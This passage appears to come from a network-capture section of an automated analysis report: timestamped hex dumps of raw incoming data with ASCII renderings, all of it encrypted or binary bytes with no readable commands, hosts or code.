5a 9c 11 95 ba 31 75 62 15 2d 04 fe 08 42 f4 af aa 13 d6 5b 26 23 a4 01 a5 c3 66 52 af 1a de 29 d8 89 ff f9 9e 38 18 5c 15 52 dc 9b b9 7f e2
                                                  Data Ascii: 7Y.DfacfAKb-]jc.p~T]^;s'4Kn</r=)OUER__B4LNmz12qH,jXpmw1~-4QJ6K/f/h.c|k'0Ro`FZ1ub-B[&#fR)8\R
                                                  2021-11-29 14:53:52 UTC72INData Raw: b3 cb ed 16 1a 5b 98 47 11 24 bb ce a8 c1 eb 28 2e c5 81 40 b2 f5 4e 22 d8 fe 27 cb d6 b7 b7 e2 99 1e b5 3f 51 fa 01 9b fc 66 c3 76 16 18 72 9a 4c 3d e8 47 a0 70 3d 5c d3 1a bf bf 27 24 71 69 d5 e4 e3 4f a5 8c 09 a4 7c 7e 54 49 73 09 41 ef 7d b5 4d 0c 05 a6 ae 20 1d 9f 2c fb 9f 4f 4a 62 e4 8b 31 a2 9d 0d 10 15 f2 ca a4 c8 0e a0 27 f3 3a e7 43 5c 74 a4 be 95 0a b3 6c e0 03 fc 1a 10 38 21 64 66 5b af 3b 07 d3 f7 d4 58 87 21 0a b2 ff 65 49 8f 0e ed e2 6d 34 ca e5 84 68 99 a2 fa b7 ae 0b 1a 64 91 18 aa 5a 35 f4 34 ac 28 1b 7f 62 8f d5 b2 a8 52 06 49 05 63 b9 d3 ab e2 ec 0f b0 9d e4 a5 88 a2 c3 74 a1 80 07 10 5f cb d3 86 06 de 26 6a da 5d fe 4c 22 eb de b0 cc 24 1c a0 9f a0 d8 23 e5 ca cb 58 30 43 b6 68 60 41 f5 7d f7 66 fa fa 51 8e 97 73 ec 26 e8 7c 16 8a f9
                                                  Data Ascii: [G$(.@N"'?QfvrL=Gp=\'$qiO|~TIsA}M ,OJb1':C\tl8!df[;X!eIm4hdZ54(bRIct_&j]L"$#X0Ch`A}fQs&|
                                                  2021-11-29 14:53:52 UTC74INData Raw: 59 a6 67 c4 55 44 92 d7 f9 95 34 4b c0 15 54 dc 81 58 1c 52 05 8b f4 24 97 af fd 58 44 03 c5 29 2d 8d b7 02 19 f8 85 28 2e 9f 68 43 33 e7 3a 5c 6d 05 ac 5c 1c a4 1b 1d d5 27 61 9f 36 e6 97 9f e4 45 94 f0 81 1f 65 c5 8a 03 2a a1 7d f2 ac 1e 11 74 fd e7 9d db 6c 0e b0 00 ed 82 e0 73 06 37 29 93 72 12 45 06 3d f3 40 42 06 f3 7c a8 35 ae 3f 6b f8 b5 d7 14 03 4b 9a ec b1 ef d2 57 03 4e 35 b5 1d 1a da e1 b1 04 80 29 94 30 7b 59 3d 26 a2 19 d4 da a3 63 d7 ae 55 39 fa 34 d8 3f 74 fd 80 b0 c1 6b f6 bf fe 25 18 e6 f0 c8 f4 81 e9 6d 19 71 6a a9 e4 07 52 b7 5f ba 2b 4f 82 d4 39 a6 c8 94 c2 92 8a f3 09 47 eb 4b 0e 52 92 b6 2e e3 ea ca 07 a2 42 3e ba 94 9c 05 57 58 f8 e8 b9 50 9f a6 43 42 41 23 b5 ca b4 e2 27 0a 9d 90 80 d7 dd f6 d6 05 5c 56 48 96 bb e8 ce 2e 55 b3 73
                                                  Data Ascii: YgUD4KTXR$XD)-(.hC3:\m\'a6Ee*}tls7)rE=@B|5?kKWN5)0{Y=&cU94?tk%mqjR_+O9GKR.B>WXPCBA#'\VH.Us
                                                  2021-11-29 14:53:52 UTC75INData Raw: 64 79 55 d4 c4 09 67 dc ea 6d 72 8f 7e ea 39 73 85 17 a6 fa fd 4d f7 bc a0 07 b5 b6 0d 06 d2 4a 38 b5 9a 05 0f 86 b9 69 03 ee b5 47 19 bc 8e ed f0 7d e9 e5 8b 35 67 65 24 b7 27 99 92 fa 4b 4d e4 d3 29 ac 5b a4 51 6b ad 27 a2 6a ac cc 92 c7 0f e2 1a 7c 7b 55 73 37 ae 53 77 89 ed 1c ca 0e c1 dd f2 61 9b a7 3b 75 92 c4 41 b2 85 63 33 2b dd 10 4d c7 53 3f fc b4 37 a9 d9 52 87 36 ae 4d 2c fc a1 90 84 ce 82 ee 0e 36 f7 bf fe 88 a4 fe c1 4a d7 3f b3 2f 78 13 74 e3 3c 11 53 6b d7 0b d3 1f 12 33 3f bd c4 e1 0f 2e a6 ea 13 30 75 9a 13 a1 87 3b 70 7d a3 10 30 f9 31 51 c8 f7 62 77 f6 92 b1 3c fe 32 cb d4 94 46 54 05 09 df 58 ae 77 95 54 7c 4d 42 c8 b9 e2 9f 96 77 a1 22 13 c2 15 e8 e2 66 a4 c1 74 c4 14 1a 64 d2 a2 c8 25 30 db 23 8f ec 57 f7 4c bb ab e4 5b 3e b5 2c 92
                                                  Data Ascii: dyUgmr~9sMJ8iG}5ge$'KM)[Qk'j|{Us7Swa;uAc3+MS?7R6M,6J?/xt<Sk3?.0u;p}01Qbw<2FTXwT|MBw"ftd%0#WL[>,
                                                  2021-11-29 14:53:52 UTC76INData Raw: 46 1b 9b 8e da c8 d6 3d 04 47 66 d0 87 96 fb cb 29 06 3e 72 86 10 29 34 53 fa 40 88 43 98 59 1e 43 df 10 bc de 6a d3 e0 36 01 d2 82 d8 e9 0d 36 4b cc 43 1b fc d4 4f 83 c1 ec 15 29 c3 8c 9d cf f4 5b 37 ce e3 39 a4 5e b7 a9 e6 a6 d8 a4 30 48 d5 2a e7 fe 66 66 65 12 09 d4 8c 23 a5 ff 4a 9e f4 39 74 94 1b b6 aa 25 de 61 40 d7 8f 42 74 a0 8a 60 2a 54 50 5e 5a 7e 17 29 cd 7f b5 4b 02 17 83 89 29 02 9e fa d5 b3 41 90 41 18 8b 33 8a 98 0a 38 18 fe d5 83 d6 06 b8 31 34 d7 cb 56 5b 4d 9a af bd 94 a1 44 c8 15 71 17 06 78 fb 70 72 4f 98 91 0a d3 f4 df 64 a3 23 26 ba 39 f3 4e 8f 0c c4 e2 79 20 e8 4a 9b 7d 9e 8a 6f a8 b2 ff 0a 4c ac 12 83 66 36 e7 3b ab 08 21 57 fa 81 c3 f4 a3 dd 01 49 1a 7f a0 c7 b6 d5 57 f1 b1 bb f8 b5 5f a3 c3 72 a8 14 0d 10 56 d5 dd 6c 13 da 8b ba
                                                  Data Ascii: F=Gf)>r)4S@CYCj66KCO)[79^0H*ffe#J9t%a@Bt`*TP^Z~)K)AA3814V[MDqxprOd#&9Ny J}oLf6;!WIW_rVl
                                                  2021-11-29 14:53:52 UTC77INData Raw: c5 a2 6f 25 30 d7 05 9e ec 57 6c 4b bf ba f3 5a 5a 9c 11 90 b3 3d 78 7a 0f c0 0d d2 1b 5d e0 b8 53 0a 04 49 0c 23 99 01 00 97 75 2c d0 75 db 2f f2 a1 db e5 fb 42 10 5c 00 70 c3 95 47 6d fe 16 85 c3 31 88 97 67 49 4a 0d c5 02 d3 96 b7 05 92 17 8a 1b 3b a7 98 43 34 f1 58 4c 4f 18 a3 77 c7 a3 03 e3 48 1a 6d ab 2d d2 10 01 8e 21 8b ea a5 93 47 c7 89 e2 51 af 62 ed 99 55 8d 65 e0 c8 83 fb 97 0e b0 00 77 93 ee 7d 0d 23 58 14 63 1b 4d e6 27 43 53 54 12 ec 64 ed 57 be 1d 64 f0 ae 5a 38 1b b5 9a d3 bd d5 de 6a c0 d4 4e de 1d 86 cf c5 84 19 8c c8 ee 3e 63 42 7f ba b3 17 de ca 6f 63 ff ae c9 28 51 2e c7 59 fe e7 a5 b0 de 2f 7d 50 f1 15 05 b2 67 d9 fd 8a 08 2b a9 62 73 bc c4 f9 4a 49 5e 0a 38 6a 9f f6 fa 4d b3 f8 c2 0e 9f d7 34 4f f7 38 fe 43 9c ad 0f c3 68 ca 14 92
                                                  Data Ascii: o%0WlKZZ=xz]SI#u,u/B\pGm1gIJ;C4XLOwHm-!GQbUew}#XcM'CSTdWdZ8jN>cBoc(Q.Y/}Pg+bsJI^8jM4O8Ch
                                                  2021-11-29 14:53:52 UTC79INData Raw: b0 84 c0 8e 52 d2 c3 72 b7 0d 00 10 5f c8 ef 85 12 f6 8f 69 f7 5c fe ee 27 eb d2 d0 e1 37 14 be cd 3a af 72 e2 dc 40 30 73 42 b7 7a 76 56 f5 9c f2 66 f6 81 51 5a 94 79 85 0b 64 7b 10 88 97 a8 41 f7 b3 bf d1 8b 9f 0f 2b bf 49 b9 b2 ba 6a 5c 9c 89 66 01 70 f6 46 19 1a 8d c5 a1 0b 53 e3 e4 17 6e 7a 32 f0 c9 98 92 f6 43 24 8e 73 2d aa 5e a4 ae 6e ad 2b be 54 ac cc 92 a5 51 8c 0d 78 51 41 4d 0b 84 f1 5b 89 eb 34 da 0c c1 c6 e3 40 b9 94 98 76 85 3c 2f 87 85 7b 32 38 d6 10 a0 cd 47 a1 ea bf 37 bf cd bd 8d 80 bf 62 3f d3 2d 88 fd b5 88 fd 04 0a c6 b0 c5 86 de fe c1 5f f3 2e be b5 78 25 67 e5 7b 9d 52 6b d5 23 77 0a 04 3e 3c 18 c4 e6 12 c3 a2 d7 14 00 4f 9a 14 bd 40 7d 5d 7f b4 68 e7 ff 29 a5 da dc 71 5b e0 91 2e 3c 85 48 dc 59 97 6c 76 06 19 ad 35 a1 61 80 7b de
                                                  Data Ascii: Rr_i\'7:r@0sBzvVfQZyd{A+Ij\fpFSnz2C$s-^n+TQxQAM[4@v</{28G7b?-_.x%g{Rk#w><O@}]h)q[.<HYlv5a{
                                                  2021-11-29 14:53:52 UTC80INData Raw: d7 f3 5e 08 84 ef 36 cc f4 45 92 df 9a b6 36 da f4 cc 18 b6 fe c8 b4 8b 90 b9 a5 47 ed c8 97 41 91 b9 d2 5b 35 a9 bb d7 37 ea 27 51 21 24 8e c8 d2 4a 3b 1a 44 76 64 87 b5 fb 57 2f 39 27 6d ee a4 b8 2b 49 d0 ac 9c 55 b0 57 19 5c ce 60 e4 43 6c c6 f6 f7 02 66 b3 c7 f4 18 5f ef ca 5c 0f 3d c1 d5 af de f2 25 c4 c3 8c 9d 53 f2 51 02 d1 94 bf a2 41 97 a8 f0 12 c2 b9 12 62 73 39 d7 fd fa c5 78 31 29 92 8c 23 b4 75 41 b9 47 24 3f 08 1d a0 90 29 66 fc 6a dd ad 75 43 39 8c 79 1b 5c bf 5e 5a 74 9d 6f ee 56 95 c5 1d 03 8e 15 26 02 bc 24 2a 9f 4f 40 c7 1e 94 1b 82 5a 0a 38 12 6e cc 90 f0 26 56 2f ca d6 7b 45 43 49 b3 8d 21 94 a8 41 f9 60 ed 1b 0f 16 3c ec 74 50 a8 b8 8c d3 fd c0 ec 5b 3d 3a ab a0 74 48 90 3f fa 6a 7f 3f d0 66 58 68 93 8a fa b1 b1 32 14 6f 25 10 b4 6e
                                                  Data Ascii: ^6E6GA[57'Q!$J;DvdW/9'm+IUW\`Clf_\=%SQAbs9x1)#uAG$?)fjuC9y\^ZtoV&$*O@Z8n&V/{ECI!A`<tP[=:tH?j?fXh2o%n
                                                  2021-11-29 14:53:52 UTC81INData Raw: fd ab ca 38 ef 3c 46 71 25 42 54 02 32 67 4d a1 67 92 79 b1 5d 4d dd c6 d7 8d 82 65 a9 a3 2f c9 15 f8 fa 68 a4 2e 63 ff 82 1a 7d d4 80 5e f7 2f c3 16 95 fd 50 6c 7f a9 44 f5 61 8d 8c 3a 94 ba 3e e2 55 a1 3a 0c f8 31 f3 ef b8 52 04 d2 27 21 21 b4 2b 4d 75 77 5d 91 18 da 2b de ec ff e4 86 2d 0f 52 17 51 c3 84 4c 64 30 15 a9 e1 42 aa 95 61 4f 59 1b c8 1a f3 8d a6 09 93 17 8a 1b 3a a8 80 48 33 f6 ad 52 71 e4 b5 50 c5 8f 1e 25 6e c8 90 7f 26 d3 f3 10 c5 4e 8b a3 a1 b9 65 6e 8a 9f 2a b9 6e c2 82 55 85 7d 0d f9 ad f4 bd 70 16 00 71 97 f8 44 89 29 73 05 68 05 56 18 2e 78 af 4d 35 ee 7b f7 a9 b7 27 98 e6 89 58 28 0f 4b 93 e6 41 ff f0 43 08 d4 1e 78 35 11 cb ef ac 1c 95 b2 0b 89 79 9c 3a ac b2 17 c7 d0 6d 63 d7 bd f9 2d f4 db c7 48 e8 40 8e ab cf 3e 67 85 b3 39 0e
                                                  Data Ascii: 8<Fq%BT2gMgy]Me/h.c}^/PlDa:>U:1R'!!+Muw]+-RQLd0BaOY:H3RqP%n&Nen*nU}pqD)shV.xM5{'X(KACx5y:mc-H@>g9
                                                  2021-11-29 14:53:52 UTC82INData Raw: 20 e4 b2 a7 db 5a fe c1 5b 86 4f b3 ae 78 11 65 f4 57 8b ac 6a f1 20 60 08 16 35 06 07 df 1f 04 11 a1 d0 14 33 cf 93 39 ab a5 4c 72 7d 48 61 e7 f8 9e 5b db e1 71 0e 71 ba cd 34 e8 1c f2 59 93 4c 42 2a 3a d3 37 32 61 84 5b c8 74 63 db a9 f9 99 b1 61 9d a0 38 bc 86 e9 f1 7d a3 f8 4c d3 88 01 63 f6 81 47 0b 32 d1 03 94 20 ee 65 60 a4 b9 e7 4a d7 21 3d 92 a1 3d 69 7a 0a 2f 1a ed 09 5b fa d7 9d 12 fa 42 33 33 99 1d 3a 65 66 47 d6 94 da 2b d2 90 d2 e1 94 20 38 6a 06 5a c9 fa 8b 7e ce 1e 94 fb 26 5e 84 71 58 5a 0d c1 3b 24 fe 0b 02 85 e3 86 21 3e d0 a4 41 33 ed b1 97 70 09 a7 70 ff 4b 1b 1d 49 31 7e 8c 40 cd f1 03 ff 63 36 ee a1 bf 73 ed a4 9f 3b a5 74 da b8 5c a5 db f7 f8 87 94 73 0e b0 0a 76 82 e2 03 2f 2a 73 05 4b a3 5e 18 20 79 79 62 19 ec 69 ed 9a b4 38 4e
                                                  Data Ascii: Z[OxeWj `539Lr}Ha[qq4YLB*:72a[tca8}LcG2 e`J!==iz/[B33:efG+ 8jZ~&^qXZ;$!>A3ppKI1~@c6s;t\sv/*sK^ yybi8N
                                                  2021-11-29 14:53:52 UTC83INData Raw: 6a 41 15 8b 38 b9 72 0b 14 0b f0 b1 49 db 06 b5 28 5b f6 67 43 5c 65 f3 8a 3d 92 b7 6c c8 40 76 37 0c 35 20 79 6a b1 86 b4 0a d0 ff bb b6 5d 22 0e 3a 5e d9 5c 96 03 ec ff 6e de e3 6a 86 70 9e 8a 6f ad 50 00 27 79 ba 15 b5 8c 3f ec 16 94 27 0d 2c 3c 8b d5 b0 30 68 16 93 34 cc bb ed a4 c7 4f 06 a6 69 f1 a1 50 b6 ce 72 be 11 fe 11 73 c8 ec 90 39 72 82 7d 0c 5c d1 d8 13 38 d7 bd 11 1f 14 a7 87 3e dc 93 e2 dc 46 ec 30 43 a6 6a 67 5c e5 3c f7 66 f0 ee 68 51 89 8d eb 1c 63 6d 7c a0 e6 f9 49 f7 a4 b5 e2 4a 9b 23 28 c6 6b a7 a1 b9 05 1e 94 97 9e 02 33 84 56 1d 0b 02 d2 e1 0e 52 f3 a3 ce 6d 7a 32 a6 2d 99 92 f0 50 4e da 70 56 6a 5d 8c eb 68 3c 32 ae 23 1a 50 89 cf 10 a5 31 7f 7b 55 74 24 8f e2 7a 89 fa 3d ce f2 c0 fb d9 5a 96 99 14 4e 92 c2 2f bd af 58 3b 38 db 17
                                                  Data Ascii: jA8rI([gC\e=l@v75 yj]":^\njpoP'y?',<0h4OiPrs9r}\8>F0Cjg\<fhQcm|IJ#(k3VRmz2-PNpVj]h<2#P1{Ut$z=ZN/X;8
                                                  2021-11-29 14:53:52 UTC84INData Raw: 1b 2c 75 7c 5d 1e 5a 12 37 6a 22 0d 1b ec 69 d3 ef bd 31 6c ee b3 cc 4c 42 49 9b f5 97 b8 de 41 29 fe 72 b7 1d 8c c2 f8 30 ac e0 a3 84 3e 69 3b 86 ba b3 13 d2 cf 7e 6c d7 bf c6 32 0a 2f eb 4d fe e0 95 b8 d1 28 7b a1 ef 72 f9 ab 40 d4 eb 90 e7 24 bb 4d 6d b7 c4 e1 1e a4 50 26 2b 4e 82 99 e7 4e e4 92 e9 e6 84 b8 05 42 f4 54 9d 5c de 57 24 ef 5b c8 04 d1 e0 2d b4 81 89 4f d0 19 fa e8 2f 69 d7 bb 4e 57 02 f8 a6 c4 a1 f4 57 c2 00 81 88 bb ec d4 3d 0f 22 69 d6 87 bf d3 89 2b 26 34 61 9c 27 fd 27 5c f0 53 93 4a 9c 35 1e 6f 96 7d d0 16 6a d9 ee e0 1c fe 63 57 c2 07 1e 71 e4 0b 13 22 de 4b d2 07 ed 05 2d c5 ff a3 cd f4 44 33 cb 9c 62 a6 5e bc 9f a2 8c c4 ac 18 05 fd 39 dd f4 70 55 d0 7d 1f 76 8c 29 c9 3b 47 a6 67 24 59 87 14 bf a4 39 3f 7e 92 c3 a7 4b 47 b4 83 6f
                                                  Data Ascii: ,u|]Z7j"i1lLBIA)r0>i;~l2/M({r@$MmP&+NNBT\W$[-O/iNWW="i+&4a''\SJ5o}jcWq"K-D3b^9pU}v);Gg$Y9?~KGo
                                                  2021-11-29 14:53:52 UTC86INData Raw: d6 0c c1 c8 fc 58 9d 8f 89 7e 8d cf d0 aa ab 7e 3a 4b ef 04 5e c6 74 c7 97 c7 76 ba d5 49 a4 ec bf 49 37 ee f5 7c 84 ce 88 e2 0e 33 eb b2 d7 f4 ba df 3f 5a f5 27 86 5d 90 ea 9a fa 71 8e 5d 6b cc 2c 68 2c ec 34 3b 74 c6 9a cc 3d a3 ff 1e 09 40 4c 9c 80 be 7c 73 55 e4 62 e7 f2 33 20 1d f0 73 74 e4 c9 f3 3c fe 3e cd 5c e0 07 56 04 10 f8 0f a3 61 8e 58 c8 ca 3e 9a ab f3 85 aa 25 b4 af 36 cb 02 7f 82 36 b7 d0 68 fb ce 09 75 cf 83 77 b3 43 90 07 9e f7 69 21 62 a4 b0 fd 54 32 ee 7c 90 ab 3c 50 3b 1b 3e 06 d6 5e 48 eb b2 5d 08 6c ff 4f 37 b3 03 21 09 a1 57 b9 71 c4 13 cb 8c d9 f7 89 34 1b a2 05 76 ca ad 0f 83 31 eb 9a e7 22 87 97 70 46 55 03 2d 08 d4 84 8f 46 7e 16 74 28 19 ac 9c 43 22 e8 b9 67 9d 1b 98 75 ff 0f 19 1d 49 29 44 93 20 f9 e2 0c ea 51 75 eb 8d a1 67
                                                  Data Ascii: X~~:K^tvII7|3?Z']q]k,h,4;t=@L|sUb3 st<>\VaX>%66huwCi!bT2|<P;>^H]lO7!Wq4v1"pFU-F~t(C"guI)D Qug
                                                  2021-11-29 14:53:52 UTC87INData Raw: 58 9a 70 34 74 85 14 a9 4b 37 0c 63 7b d1 84 6a 5f aa 95 2b c2 7d 52 5c 71 71 39 f7 02 81 4a 61 1d 18 be 8e 20 6c 92 04 d4 29 4f 40 4a 1a f0 f7 a2 8c 0e 3b 96 63 d5 82 9b 42 b7 2f ca d4 e4 30 62 67 ac a0 a4 f8 c4 2d e4 15 7b 35 56 3a 20 7a 5a 08 85 98 0d cb 92 44 71 5d 24 79 8a eb e8 44 f1 31 ee f6 73 08 a0 44 84 62 1f 6a 66 b7 af 0d 1d 6d bb 6d 60 5a 33 e3 11 f8 22 74 9c fa 8b d1 3a 09 d2 03 4b 7e a9 ad c7 bb be ce 0f b0 96 f2 f6 99 a1 c3 76 39 ba 8c 2f 5f ca c6 9a 3a c5 84 6a d0 7f 8c d0 22 e1 c3 75 4a 1f 14 b4 b5 10 95 21 e3 d6 32 7c 30 43 ac 01 bf 55 dd da dc 75 f2 e6 51 02 94 73 e0 27 b3 f6 3c 8a f8 e8 3d 3c b5 bc fd a2 92 27 77 d0 61 b1 a1 a1 16 09 a5 18 65 03 1f b6 44 6a 22 8c ed eb 10 39 96 ca 3d 6c 70 10 d9 9e 99 98 e1 47 53 14 01 6e ae 5d 86 c7
                                                  Data Ascii: Xp4tK7c{j_+}R\qq9Ja l)O@J;cB/0bg-{5V: zZDq]$yD1sDbjfmm`Z3"t:K~v9/_:j"uJ!2|0CUuQs'<=<'waeDj"9=lpGSn]
                                                  2021-11-29 14:53:52 UTC88INData Raw: 76 65 9c 31 1c 49 36 6d fb e7 f9 f3 07 86 75 89 ea ab a0 0f b6 cb 9d 3b a5 4a a9 b1 55 87 73 b3 f5 80 fb bf 0c cb cb 71 93 ea 65 0a 2e a5 80 49 1c 5a 1a 5d bf 51 4c 1d fd 6e d3 e1 bd 31 6c e5 de 9c 3f 03 4f 9c 8c 81 fc dc 4b 32 de 46 f4 1f 86 c1 c7 e0 19 8f bf 94 3a 10 05 57 ba b9 3f 8b f8 6d 69 ff e9 cb 28 fe 3f c2 59 e5 63 a7 ab de 2a 11 63 f0 39 03 1d 03 cf fb 9c fc 88 bd cf 64 b7 c4 fc 29 7c 5f 26 3e 48 8c db cf c0 e2 94 c2 0c e0 2d 16 4d f0 54 9f 6b db a8 25 c9 6a b1 c1 a2 de 2b b3 f8 ae 27 a3 52 e9 e0 56 00 93 b9 44 75 6c bd a4 ce ba e8 4b 05 03 81 84 e0 94 d4 3d 0f 74 11 d6 87 bf ea ce 38 2b b1 5b 97 38 bc 4f 9e f0 42 98 e2 df dd 1e 43 df dd 80 8b 68 a2 21 e8 0d fe bc c9 ef d1 91 59 cc 43 13 59 04 49 a9 c5 fc 08 2b c4 ff a3 cd f4 44 33 c6 9c 62 a6
                                                  Data Ascii: ve1I6mu;JUsqe.IZ]QLn1l?OK2F:W?mi(?Yc*c9d)|_&>H-MTk%j+'RVDulK=t8+[8OBCh!YCYI+D3b
                                                  2021-11-29 14:53:52 UTC90INData Raw: e5 8b 35 7d 71 2f 0f b0 92 83 f9 56 d1 e4 63 2d ac 57 9f ea 43 bc 2d d1 76 0c ca 89 ce 9c 99 25 b3 7f 5f 58 2c 0b f6 73 89 ea 27 d8 1d cb c1 dd 85 96 8f 9e d3 83 c8 3a bf 93 4b 9a 38 d1 0c 48 40 54 a3 fd b5 21 90 24 42 8c a6 91 4b 16 bd cc 88 fd 02 88 fd 04 54 65 b2 c6 fa b4 fa d6 8d 54 3b be b5 6a 3d 2c e7 53 97 26 4a dd 23 6c 66 de 35 17 07 c6 9a c9 3d a3 ff 07 1c 42 8b 17 31 96 e0 71 7d a9 c1 f6 fc 26 8d c8 f4 62 74 f3 b2 f3 73 00 cb 23 5b 91 3d 9d 04 1a d4 4e 2e 4a 84 51 dc 27 98 db a9 f7 98 e8 b9 b4 d4 fb c2 15 ed 9f af 0f bf e4 d2 88 0d 5f c5 99 5f 27 30 fb 05 9e fd 47 67 60 b5 ac ff 66 bf 9d 3a 85 55 37 54 7f 01 35 0c f9 0f b4 ea 94 56 05 f1 48 27 39 4c 02 07 76 5c 55 92 96 d9 50 13 83 d9 e2 08 9c 3a 5c 04 49 f3 96 47 0b ce 14 85 e3 31 88 86 77 42
                                                  Data Ascii: 5}q/Vc-WC-v%_X,s':K8H@T!$BKTeT;j=,S&J#lf5=B1q}&bts#[=N.JQ'__'0Gg`f:U7T5VH'9Lv\UP:\IG1wB
                                                  2021-11-29 14:53:52 UTC91INData Raw: 07 02 cd 49 ab c1 ff 0e 01 57 8d 9d c9 e7 47 02 cf ee 23 a4 d3 9d b7 e4 8f d7 ab 10 43 fe 39 d7 70 4d c3 67 13 1a 70 9d 28 9c 56 45 a6 65 2d 62 87 08 ad a6 27 2d 40 6c c3 8b 6a 5d b1 98 72 14 ea 7f 5e 5c 67 08 78 fa 56 64 4f 1d 05 98 9f 33 09 87 10 c5 98 6f 40 5a 18 8b 22 b1 9e 19 10 84 f3 ca 89 c8 0f c2 0d c8 d6 e1 50 54 74 a4 bb b1 fd 9f 6e e6 13 67 0e 15 2e 31 7d fc f8 90 42 14 c6 ee ce 5b 49 33 07 a5 e7 79 58 a1 1c fd f3 6e f6 f1 43 95 66 84 5c 75 b9 bf 0f 1a 75 88 f0 ba 57 47 66 3d bd 21 1e 52 ed 51 c2 62 33 f4 01 49 04 4a e4 c5 bf c0 3b 1d b0 97 eb 9e 5f b0 cb 5a f0 0c 00 1a 4e c7 a8 85 13 f6 8f 05 fe 55 d6 d6 34 f8 d1 b7 d4 33 02 a5 b0 b6 6b 34 39 cf 50 4c 3f 68 9e 6d 73 44 d2 4f e1 48 d7 ff 7f 49 93 62 e5 a1 7a 74 77 a2 12 eb 40 fd 9d 68 f8 b4 90
                                                  Data Ascii: IWG#C9pMgp(VEe-b'-@lj]r^\gxVdO3o@Z"PTtng.1}B[I3yXnCf\uuWGf=!RQb3IJ;_ZNU43k49PL?hmsDOHIbztw@h
                                                  2021-11-29 14:53:52 UTC92INData Raw: e2 0a 50 10 5c 05 72 d8 94 47 74 bd 42 87 eb 3b f2 9e 76 93 5d ca 5e 22 f8 8d b6 11 80 ea 8f 26 3c ae 96 cd 84 f5 a5 5b 4b 73 b4 7c c1 b7 1f 0c 4d 20 91 83 24 fe df 14 dd 98 8f ea a7 a8 61 49 f1 9f 3b ae 4a f2 b2 55 87 16 a5 fa 81 f1 c5 1f b5 2a 71 93 ee 7f 2b 2d 73 cb 62 1c 5a d8 26 6f 40 5a 0a e6 5b 4e a8 bf 31 66 f6 af 4d c1 02 67 98 e7 ac f4 dc 50 29 ce cb b4 31 83 dd e4 bf 08 85 b5 94 34 7e b8 54 96 b9 06 c9 c0 c2 63 d7 ae d7 3b fe 2e d6 42 f7 fc 70 aa f2 2e 41 f8 ef 28 14 a0 6c c8 f0 83 e7 d4 84 4c 6f a6 cd ef 5a 2d 4c 23 25 53 8e d7 19 5e c2 8b c8 f0 9a d1 1c 5c f2 52 44 50 9a b6 2e d0 62 ca 16 a8 c1 20 4a 8a bc 22 b5 4b f0 f7 35 52 9b b9 5f 57 35 ac 5a c5 87 e5 00 ba 01 81 8e d7 c6 c5 37 05 4d 5c cb 90 4b fa e7 25 37 36 63 9e b6 09 06 fc ef 5a 8f
                                                  Data Ascii: P\rGtB;v]^"&<[Ks|M $aI;JU*q+-sbZ&o@Z[N1fMgP)14~Tc;.Bp.A(lLoZ-L#%S^\RDP.b J"K5R_W5Z7M\K%76cZ
                                                  2021-11-29 14:53:52 UTC93INData Raw: fc 79 4a 91 61 e9 18 c9 7a 16 8c c1 ed 42 f7 b5 94 49 b5 9a 09 3e d6 70 bd b0 cb dc 0f 9d 8d 62 78 c3 b4 47 1d 0a 14 96 3e 0e 53 e1 e4 a1 6d 7a 3e 9d e7 45 92 f0 45 5d 56 09 cd ac 5d 88 80 03 af 2d db a2 e6 e9 b0 fd 06 8d 07 6d 73 5c 4f 33 ae 9e 73 89 ed 1c 07 08 c1 d1 dd e4 93 8f 9e 57 84 d1 29 83 bf 63 39 32 0f 25 7b e4 5c a3 fd be 24 b1 d6 63 8d ac bd c9 15 2d ca 8a 80 e6 27 fc 00 26 c2 a4 d5 fc 8d c6 c1 5b d3 f0 be a4 6c 2c e3 e4 53 9d 44 69 a6 ff 77 1b 16 bb a0 14 1e f6 df 2e ac e8 1d 20 8b 9a 13 ab bc 07 ad 7d a3 67 f6 f3 ab 48 d6 f2 08 ac e2 ba c9 2f f5 23 0a c3 80 4a 56 7f c7 d0 49 a5 4d ca 40 d8 4d 41 cf 81 25 8b 82 65 a0 22 3b c2 15 e8 e5 63 a1 f8 c1 d3 88 01 5d 59 8a 6f 2f 21 dd 11 b6 43 43 67 66 b2 37 f3 4d a4 9c 29 86 bf 1e db 7d 19 34 24 a4
                                                  Data Ascii: yJazBI>pbxG>Smz>EE]V]-ms\O3sW)c92%{\$c-'&[l,SDiw. }gH/#JVIM@MA%e";c]Yo/!CCgf7M)}4$
                                                  2021-11-29 14:53:52 UTC95INData Raw: 31 5e 56 de 98 8f 94 20 28 26 34 61 9b 29 b2 21 68 72 42 9c 55 b6 da 11 2c e1 7d ab d5 7c c8 e6 87 e2 fa b5 d2 86 6d 1c 73 c6 50 1c 33 d9 61 15 c3 ed 03 32 ac e7 9f cf fe 62 14 c8 fe 2d cb 6a b4 b7 ee 9f c8 b1 e6 2d f7 38 d7 f7 09 a9 65 12 03 7b 9d 28 9c c7 44 a6 65 54 18 96 1b b5 93 27 2b 66 7d cc e4 5e 4c a5 80 09 50 7e 7e 54 7c 5f 27 78 fc 56 c4 4b 1d 05 a3 94 31 16 bd 2a d7 9f 49 2f 37 1a 8b 3b 84 9d 01 3e 03 fc a5 bb d9 06 bb 40 a6 d4 e7 49 7a 74 a2 bd 6b 81 b9 7d e8 04 68 23 46 c7 df 8f 7a 62 b7 89 0c fb 26 c4 70 5b 4d 66 b6 e9 e2 68 9e 05 fd fc 6d 08 5e 44 84 6e 85 07 61 b7 ae 00 1f 74 ad 3e 08 5a 33 ed 15 ac 20 0f 5d 95 e6 d7 b4 b4 f9 10 42 2d 46 ae c7 b9 a5 23 0d b0 9d d6 83 57 b0 c8 1d 65 0d 00 1a 0e c4 c3 d4 3e ff 81 4a 61 56 d6 d0 76 c0 d0 a7
                                                  Data Ascii: 1^V (&4a)!hrBU,}|msP3a2b-j-8e{(DeT'+f}^LP~~T|_'xVK1*I/7;>@Iztk}h#Fzb&p[Mfhm^Dnat>Z3 ]B-F#We>JaVv
